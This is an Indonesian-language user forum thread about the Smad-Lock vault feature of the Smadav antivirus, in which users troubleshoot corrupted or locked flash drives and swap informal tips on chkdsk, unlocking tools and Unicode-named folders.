flasdisk agan korupt, flshdisk agan 99% tidak bisa disembuhin lagi.alias dituker ke tokonya lagi/dibuang.
kalau masalah datanya 75% masih bisa dibalikin.coba pake RECUVA.
kadang secara tidak sadar kita menaruh flsashdisk di kantong.hal ini seringkali menyebabkan flasdisknya berkeringat
atau terkena keringat.sehingga terjadi konsleting kecil pada komponennya. 8)  8)  8)

Lho bukan gara2 virus ? tapi ko ngepass bgt ya cuma di folder smad-lock aja, folder lain nya nggak ?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: ►Thierry Agusta◄ pada Mei 21, 2011, 02:26:16 PM
Hallo bro semua mohon bantuannya donk, file2 saya yg saya taro di "smad-lock (Brankas Smadav)" kena virus semua trus berubah ukuran nya jadi total 17 G padahal FD saya cuma 4Giga, trus nama2 file dan folder berubah semua, n file aslinya pada ilang nih screen shoot nya
Cara balikin file2 saya gimana ya Bro ? saya taruh di folder "smad-lock (Brankas Smadav)" supaya ga kena virus eh malah ini satu2 nya folder yg kena, folder lain nggak
Maaf ya gan ,bukannya ane nakut-nakutin.tapi ane ikut bela sungkawa atas kematian flash disk agan.
flasdisk agan korupt, flshdisk agan 99% tidak bisa disembuhin lagi.alias dituker ke tokonya lagi/dibuang.
kalau masalah datanya 75% masih bisa dibalikin.coba pake RECUVA.
kadang secara tidak sadar kita menaruh flsashdisk di kantong.hal ini seringkali menyebabkan flasdisknya berkeringat
atau terkena keringat.sehingga terjadi konsleting kecil pada komponennya. 8)  8)  8)

Lho bukan gara2 virus ? tapi ko ngepass bgt ya cuma di folder smad-lock aja, folder lain nya nggak ?


yaa itu karna filee yang agan taro di foldersmadav nggak di kopi keluar dulu tapi langsung di proses di dalam folder naa pada saat sedang proses / kerja flasdisk agan di cabut paksa tanpa safly remove hatdwere jadinya isinya korup gann
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: ferdiyanto_darmwan pada Mei 26, 2011, 04:26:04 AM
 Mas Zai aku br pk smadlock,eh ga tau na pas aku mskin mmc utk photo digaital malah kekunci.Tlg dong gmna cr bukana?thx ~x(
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Tanma Kunyomi pada Mei 31, 2011, 01:30:47 PM
Aku dulu pernah kejadian fd ku gak bisa di keluarin, pada hal sudah tidak ada proses sama sekali pada komp (sudah aku biarkan pada tampilan dekstop lama sekali), tetap aja gagal dikeluarin.. Apakah itu dulu karna virus ya?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Deny MiniDwarf pada Juli 01, 2011, 09:06:50 PM
@Ferdiyanto (http://smadaver.com/profile/ferdiyanto_darmwan/):coba menu tool=>Smad-lock ntar pilih disk yang dilock trus pilih opsi unlock...
Judul: Keluhan Dan Saran smad lock
Ditulis oleh: AbelzTheSmadaver™ pada Juli 16, 2011, 05:41:00 PM
Nih smadav klo bikin folder smad-lock usahakan bisa dibuka semua aplikasi karena selama ini file yang di smad-lock klo mau dibuka harus dikeluarkan dahulu ~x(
trims. :-bd
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: thirteen™ pada Juli 16, 2011, 05:49:59 PM
Nih smadav klo bikin folder smad-lock usahakan bisa dibuka semua aplikasi karena selama ini file yang di smad-lock klo mau dibuka harus dikeluarkan dahulu ~x(
trims. :-bd

kan udah dijelasin fungsi smadlock seperti itu....aplikasi .exe yg anda taruh di smadlock harus dipindah dulu ke folder lain untuk bisa dibuka !
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: :Pak:Bos: pada Juli 16, 2011, 06:45:58 PM
@pyz: smadav tidak membuat write protect pada usb, selain itu lock smadav juga tidak mmpengaruhi apapun, smadav hanya membuat folder biasa Δ smad-lock Δ @kipli: filenya corrupt tuh? Penyebabnya sudah dijelaskan diatas.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: PhaMenThaR pada Agustus 02, 2011, 09:49:46 AM
koq tiba2 fd gw jadi gini ya  :-\
padahal waktu kemaren2 pake fitur smadlock ga gini deh  :'(
(http://i53.tinypic.com/2gy9kjl.jpg)
dah coba scan pake MSE dan ESET ga detect apa2 tuh  :-\
what happend  ???
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: ►Thierry Agusta◄ pada Agustus 02, 2011, 09:55:32 AM
ah... itu korup bro masalahnya lagi proses ente cbut om... jadi dengan kata lain RUSAK coba format \m/
Flasdisk kapasitas 2 GB isinya ampe 40GB lebih kwokwowko :-X Moga berhasil  :-bd
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: T.R.O.J.A.N¤¤S.P.Y pada Agustus 02, 2011, 11:13:52 AM
ah... itu korup bro masalahnya lagi proses ente cbut om... jadi dengan kata lain RUSAK coba format \m/
Flasdisk kapasitas 2 GB isinya ampe 40GB lebih kwokwowko :-X Moga berhasil  :-bd
Jangan lupa di pndahn dlu data2 pentingnya.. :D
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: PhaMenThaR pada Agustus 02, 2011, 02:11:21 PM
ah... itu korup bro masalahnya lagi proses ente cbut om... jadi dengan kata lain RUSAK coba format \m/
Flasdisk kapasitas 2 GB isinya ampe 40GB lebih kwokwowko :-X Moga berhasil  :-bd
baru tau kalo gitu ternyata korup  =)) =)) =))
dah ga masalah lagi setelah di format  :P
Jangan lupa di pndahn dlu data2 pentingnya.. :D
data ga maslaah koq cuma nginstal2 laptop teman  :)
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: :Pak:Bos: pada Agustus 02, 2011, 04:03:26 PM
Sebenarnya file corrupt bisa direpair dengan cmd.exe
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: PhaMenThaR pada Agustus 02, 2011, 10:10:16 PM
Sebenarnya file corrupt bisa direpair dengan cmd.exe
ohh ya  :-\
bijimane caranya tuh  ???
mohon bimbingan  :D
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: :Pak:Bos: pada Agustus 03, 2011, 04:21:14 AM
Dari cmd langsung ke drive fd kemudian ketikkan chkdsk /f. Contoh G:\>CHKDSK /F kemudian pilih yes sampai selesai
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: PhaMenThaR pada Agustus 03, 2011, 07:32:26 AM
Dari cmd langsung ke drive fd kemudian ketikkan chkdsk /f. Contoh G:\>CHKDSK /F kemudian pilih yes sampai selesai
thanks 4 info.
ntar deh kalo ada FD yg corrupt gw coba cara di atas  :-bd
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: :Pak:Bos: pada Agustus 03, 2011, 05:41:11 PM
Sama sama gan
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Raden Mas Gepenk pada Oktober 14, 2011, 02:39:24 PM
Dari cmd langsung ke drive fd kemudian ketikkan chkdsk /f. Contoh G:\>CHKDSK /F kemudian pilih yes sampai selesai
thanks 4 info.
ntar deh kalo ada FD yg corrupt gw coba cara di atas  :-bd
wah ane telat...FD udah terlanjur di format  :'(~x(, kasus ane sama persis...hmmm :-\ ...cari2 di mbah google baru ketemu di forum ini... :(
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: fabrie pada Desember 08, 2011, 01:36:46 PM
Di trit smadav 8.8 ga ditanggepin :D disini aja deh kyknya lebih tepat
beberapa hari yang lalu adik ane colokin flashdisk ke laptop ane gan,,, trus kedetek virus ama avira , ane jg pake smadav pro.... dan yg bkin ane kaget ternyata lokasi virus  yg di hajar avira tsb di brankas smadav yg di flashdisk :-o folder smad-lock bs tembus :(
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: b_agoy pada Desember 08, 2011, 01:49:10 PM
Di trit smadav 8.8 ga ditanggepin :D disini aja deh kyknya lebih tepat
beberapa hari yang lalu adik ane colokin flashdisk ke laptop ane gan,,, trus kedetek virus ama avira , ane jg pake smadav pro.... dan yg bkin ane kaget ternyata lokasi virus  yg di hajar avira tsb di brankas smadav yg di flashdisk :-o folder smad-lock bs tembus :(

Terdeteksi sbg virus apa?? bisa kirim sampelnya kesini?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: fabrie pada Desember 08, 2011, 02:26:01 PM
Di trit smadav 8.8 ga ditanggepin :D disini aja deh kyknya lebih tepat
beberapa hari yang lalu adik ane colokin flashdisk ke laptop ane gan,,, trus kedetek virus ama avira , ane jg pake smadav pro.... dan yg bkin ane kaget ternyata lokasi virus  yg di hajar avira tsb di brankas smadav yg di flashdisk :-o folder smad-lock bs tembus :(

Terdeteksi sbg virus apa?? bisa kirim sampelnya kesini?
di avira kedetek ramnit.a dan ramnit.c ,,, wah samplenya ga ada gan udah lgsg remove,, saya taunya virus itu ada di smadlock di avira kan ada menu detail tih sebelum remove bs cek dlu file yg dianggap virus apa dan lokasinya dimana,,, ya itu lokasinya didalam folder smadlock yg ada di flashdisk :(
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: mentalist pada Desember 08, 2011, 03:03:16 PM
Di trit smadav 8.8 ga ditanggepin :D disini aja deh kyknya lebih tepat
beberapa hari yang lalu adik ane colokin flashdisk ke laptop ane gan,,, trus kedetek virus ama avira , ane jg pake smadav pro.... dan yg bkin ane kaget ternyata lokasi virus  yg di hajar avira tsb di brankas smadav yg di flashdisk :-o folder smad-lock bs tembus :(

bisa, folder Smad-Lock bisa di tembus asalkan software atau programx support \ mendukung system UNICODE

pada folder :

Δ Smad-Lock Δ

tanda segitiga di depan dan belakangx itu ada senjatax, jadi kalo kita hapus tanda Δ yg ada di depan dan di belakangx itu, jadilah folder biasa

perlu di ingat tanda Δ adalah karakter UNICODE dan yg sekarang di gunakan oleh smadav...  ;)

dan kayax sih AVIRA udah support system UNICODE...  :)
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: b_agoy pada Desember 08, 2011, 03:25:21 PM
Ada kemungkinan jika file yg dimasukkan folder smadav sebelumnya udah keinfeksi duluan, jadi ya jelas kedetek didalem folder. Ini perkiraan saya sih :)
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: fabrie pada Desember 08, 2011, 10:02:45 PM
Di trit smadav 8.8 ga ditanggepin :D disini aja deh kyknya lebih tepat
beberapa hari yang lalu adik ane colokin flashdisk ke laptop ane gan,,, trus kedetek virus ama avira , ane jg pake smadav pro.... dan yg bkin ane kaget ternyata lokasi virus  yg di hajar avira tsb di brankas smadav yg di flashdisk :-o folder smad-lock bs tembus :(

bisa, folder Smad-Lock bisa di tembus asalkan software atau programx support \ mendukung system UNICODE

pada folder :

Δ Smad-Lock Δ

tanda segitiga di depan dan belakangx itu ada senjatax, jadi kalo kita hapus tanda Δ yg ada di depan dan di belakangx itu, jadilah folder biasa

perlu di ingat tanda Δ adalah karakter UNICODE dan yg sekarang di gunakan oleh smadav...  ;)

dan kayax sih AVIRA udah support system UNICODE...  :)
nama foldernya masih utuh gan :D
Ada kemungkinan jika file yg dimasukkan folder smadav sebelumnya udah keinfeksi duluan, jadi ya jelas kedetek didalem folder. Ini perkiraan saya sih :)
bisa juga sih,,
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Ignasius Dewanto pada Desember 17, 2011, 12:11:37 PM
Ane berani nge-block autorun .inf. pas dibuka gini:
G:\autorun.inf\con\nul. this autorun.inf has LOCKED by SMARTP for safely  =)) ngebacanya  =))
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Ki@mhu pada Desember 17, 2011, 12:27:17 PM
Ane mau tanya, karakter Unicode itu berupa apa-apa aja? Apakah huruf2 kanji juga termasuk Unicode? Trims sebelumnya.. :)

Di trit smadav 8.8 ga ditanggepin :D disini aja deh kyknya lebih tepat
beberapa hari yang lalu adik ane colokin flashdisk ke laptop ane gan,,, trus kedetek virus ama avira , ane jg pake smadav pro.... dan yg bkin ane kaget ternyata lokasi virus  yg di hajar avira tsb di brankas smadav yg di flashdisk :-o folder smad-lock bs tembus :(

Terdeteksi sbg virus apa?? bisa kirim sampelnya kesini?
di avira kedetek ramnit.a dan ramnit.c ,,, wah samplenya ga ada gan udah lgsg remove,, saya taunya virus itu ada di smadlock di avira kan ada menu detail tih sebelum remove bs cek dlu file yg dianggap virus apa dan lokasinya dimana,,, ya itu lokasinya didalam folder smadlock yg ada di flashdisk :(
Biasanya file yang di-Remove itu tidak benar2 dihapus, melainkan cuma dipindah ke folder karantina.. Jadi, masih bisa diambil sampelnya.. Tapi kalo agan belum biasa dengan sampel virus, sebaiknya jangan karena nanti malah terinfeksi kalo dijalankan secara tidak sengaja.. :)
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: 3ndiixz pada Januari 20, 2012, 06:49:10 AM
permasalahannya bukan dri si payung merah yang bisa nembus Smadlock,,, tapi Smadlock yang agan pakai d FD agan itu emang sebelumnya di isi file .html, .dll yang terinfeksi Ramnit,, makanya si payung merah lgsung munculin payungnya,,,
klo pengen lbih aman n nyaman dalam pnggunaan Smadlock,, semua file2 penting agan yang mw dsimpen dsitu sebaeknya bersih dr infeksi virus,, klo yang dmasukkan it ud terinfeksi ya sma aj bagiq,,, cz Smadlock berfungsi sbgai pnghalang infeksi virus,
klo aq pake folder karakter unicode kayak gini di kompi, fd n hd portabel buiar aman dr semua virus

۝ KEMO Folder Safe ۝

۩.K.E.M.O.۩™

۩ ۝ Δ .P.E.N.D.I.K. Δ ۝ ۩™
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: gokil pada Februari 11, 2012, 12:02:53 PM
tolong pencerahan dari agan agan semua...
ane punya flaskdisk kingstoon 4GB.
sekarang ngak bisa di akses karena ada  smad-lock.
ane dah coba anlock dari tools smadav tapi ngak bisa.
Status FD ane semi-lock
harus gimana menghilangkannya?
mohon binbingannya!!!!!
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: M. Ridzky pada Februari 11, 2012, 10:20:18 PM
hapus manual bisa ngk
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: gokil pada Februari 14, 2012, 10:43:19 PM
ngak bisa bosss
dah pake segala cara tetap ngak bisa
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Ryan BeKaBe pada Februari 14, 2012, 10:54:08 PM
tolong pencerahan dari agan agan semua...
ane punya flaskdisk kingstoon 4GB.
sekarang ngak bisa di akses karena ada  smad-lock.
ane dah coba anlock dari tools smadav tapi ngak bisa.
Status FD ane semi-lock
harus gimana menghilangkannya?
mohon binbingannya!!!!!
Anda yakin itu disebabkan Smad-Lock?
Saya pikir sih tidak.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Anak BodoH GapteK pada Februari 15, 2012, 07:53:57 AM
tolong pencerahan dari agan agan semua...
ane punya flaskdisk kingstoon 4GB.
sekarang ngak bisa di akses karena ada  smad-lock.
ane dah coba anlock dari tools smadav tapi ngak bisa.
Status FD ane semi-lock
harus gimana menghilangkannya?
mohon binbingannya!!!!!
Anda yakin itu disebabkan Smad-Lock?
Saya pikir sih tidak.
tolong pencerahan dari agan agan semua...
ane punya flaskdisk kingstoon 4GB.
sekarang ngak bisa di akses karena ada  smad-lock.
ane dah coba anlock dari tools smadav tapi ngak bisa.
Status FD ane semi-lock
harus gimana menghilangkannya?
mohon binbingannya!!!!!
Anda yakin itu disebabkan Smad-Lock?
Saya pikir sih tidak.

mending di forman ajah ... HEHEHE
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: PraskaOk.Revisi2 pada Februari 15, 2012, 10:54:47 AM
ngak bisa bosss
dah pake segala cara tetap ngak bisa

mampoes  :puke
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: AnugrahA pada Juni 18, 2012, 09:52:28 AM
Kenapa Tampilan Smad Av PAke Tab Bukan PAke Picture Box Dan Command Button ?? 

Mohon Dijawab  ^:)^
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Ryan BeKaBe pada Juni 18, 2012, 10:35:54 AM
Kenapa Tampilan Smad Av PAke Tab Bukan PAke Picture Box Dan Command Button ?? 

Mohon Dijawab  ^:)^
Memangnya pakai Picture Box apa kelebihannya?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: thirteen™ pada Juni 19, 2012, 06:12:22 AM
Kenapa Tampilan Smad Av PAke Tab Bukan PAke Picture Box Dan Command Button ?? 

Mohon Dijawab  ^:)^

sebenarnya kamu tahu picture box sama command button ga bro?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: kru samadav pada Juli 05, 2012, 03:53:46 AM
Smadlock yang ane sukai dari produk smadav adalah bisa menjaga file dengan aman dari serangan virus ya..selayaknya brankas sungguhan yang berfungsi sebagai tempat penyimpanan barang penting..
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Pieter Poker pada Juli 29, 2012, 01:44:34 PM
gila.a.a.a.aa.,hebat tuh smadav
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: henricoaldyferdian pada Agustus 14, 2012, 11:34:18 PM
ane tau kenapa kagak bisa ditembus virus, nama foldernye yang mengandung karakter unicode.cuma virus yang mendukung karakter tsb yg bisa masuk
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: fanglisinaulan pada Oktober 14, 2012, 09:18:19 PM
ane sampe skrang belom tau make smad lock, padahal sangat berguna kata teman ane
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: PunyaNama pada Oktober 17, 2012, 03:02:05 PM
emang pertahanan smad-lock nya cuman di unicodenya itu aja yah? ???
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: si saprol pada Oktober 17, 2012, 05:27:38 PM
namum walaupun aman dari virus, harus diingat, file instalan (misal .exe) sblum dieksekusi harus dipindahin keluar dari folder smadlock dulu.
dan juga file yg mau di upload (misal .jpg) juga harus dipindahkan keluar dari folder tersebut
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: PunyaNama pada Oktober 17, 2012, 08:16:24 PM
owh,jadi emang kayak brankas ya,harus dikeluarin dulu
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: 3ndiixz pada Oktober 17, 2012, 08:24:42 PM
kalo aq mah tak modif seperti ini foldernya biar aman n asyik

. ۞ P.E.N.D.I.K  ۞™
. ۝ ۩. 'SEMUA DATA Q' .۩ ۝
. Δ % A.N.T.I.V.I.R.U.S Δ
. Δ % G.A.M.B.A.R Δ
. Δ % G.A.M.E.Z
. Δ % K-T.y.k.a.n Δ
. Δ % M.A.S.T.E.R  P.R.O.G.R.A.M Δ
. Δ % M.U.S.I.C Δ
. Δ % V.I.D.E.O Δ


atow pake yang ini bisa

۝ KEMO Folder Safe ۝

ini yang ASLI juga bisa

Δ Smad-Lock (Brankas Smadav) Δ

yang penting foldernya pake karakter unicode n aman dari serangan virus
file exe ddalam folder dg karakter unicode ada yang support kok alias gak perlu dicopas k luar dulu,, bisa langsung dobel klik n programnya jalan,, klo programnya gak bisa jalan n muncul pesan program tdk bisa djalankan ddalam folder dg karakter unicode baru dicopas k my document misalnya

hal ini dmaksutkan agar file installer program tdk terinfeksi virus penginjeksi exe semisal Virut, Sality, Small.I, dll

 ―•ı[яαωαяσητεκ]ı•―
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: 3ndiixz pada Oktober 17, 2012, 08:41:12 PM
яαωαяσητεκ
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: PunyaNama pada Oktober 18, 2012, 05:30:11 AM
emang klo smad-lock dibuat dengan karakter selain unicode bisa gak? ???
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: wahabtea pada Mei 07, 2013, 09:07:45 PM
Emang bener 2 manjur dech...
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Ignasius Dewanto pada Mei 23, 2013, 11:41:23 AM
kalo gag pake unicode gampang ditembus virus kayaknya. Smadav mestinya selain antivirus juga ada perhatian kepada Smad-Lock biar gag ditembus. Di-rename malah gag kerja
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: rizqyluck pada September 04, 2013, 02:23:14 PM
good post min...
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: matlexaw pada Oktober 20, 2014, 09:42:22 AM
Klo mau nambahin file di brankas smadav, bisa otomatif detek ga kalo file yang akan kita tambahin ada virusnya?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Manggolo pada Oktober 20, 2014, 04:53:23 PM
kalau virusnya masuk dalam database smadav akan tetap terditek
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: matlexaw pada Oktober 27, 2014, 09:32:09 AM
ok, makasi gan
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: syafiq*_* pada Januari 28, 2016, 09:06:03 PM
SMADAV memang oke, apalagi ada amad-lock nya :) maju terus SMADAV  :-bd
Judul: Re:Smad-Lock (Brankas Smadav)
Ditulis oleh: 3ndiixz pada September 08, 2019, 06:31:25 AM
Menanggapi kasus seperti dibawah ini dari laporan beberapa user

Hi, saya pengguna Smadav berbayar.

Sejak auto update ke versi 11.5 saya merasa terganggu dengan Drive Letter di Windows Explorer (Windows 7) saya yang berubah namanya menjadi Local Disk semua untuk external disk.

Bagaimana cara memperbaikinya?

Terima kasih.
link postingan disini (https://smadaver.com/index.php?topic=27121.msg245533#msg245533)

(http://www.upl.co/uploads/PendikAsyik/local-disk.jpg)

Begini cara memperbaikinya,
1. Dengan fitur bawaan Smadav Pro yaitu Smad-Lock (Pengebalan)
Silahkan masuk menu Tools > Smad-Lock lalu centang drive yang ingin dipulihkan nama drivenya, kemudian pilih Unlock
(http://www.upl.co/uploads/PendikAsyik/Screenshot--08092019--0551.png)

2. Jika gagal Unlock karena suatu hal/masih dikunci, selanjutnya anda bisa menggunakan salah satu dari aplikasi Iobit Unlocker (https://www.iobit.com/ko/iobit-unlocker.php) dan aplikasi File Governor (https://www.novirusthanks.org/products/file-governor/) dari NoVirusThanks lalu instal.

Setelah itu cari file autorun.inf yang ada di drive yang mana namanya berubah menjadi Local Disk, misalnya di drive D, E, F, G, bisa di flashdisk, di hdd portable,

Selanjutnya klik kanan pilih Unlock with File Governor... kemudian hapus

(http://www.upl.co/uploads/PendikAsyik/Screenshot--08092019--0540.png)

(http://www.upl.co/uploads/PendikAsyik/Screenshot--08092019--0617.png)



Atau klik kanan pilih IObit Unlocker
(http://www.upl.co/uploads/PendikAsyik/Screenshot--08092019--0607.png)

Kemudian pilih Unlock & Delete
(http://www.upl.co/uploads/PendikAsyik/Screenshot--08092019--0612.png)

Setelah berhasil menghapus file autorun.inf tadi silahkan restart komputer anda
Semoga berhasil  :-bd :-bd

by Pendik Asyik (https://s.id/PendikAsyik)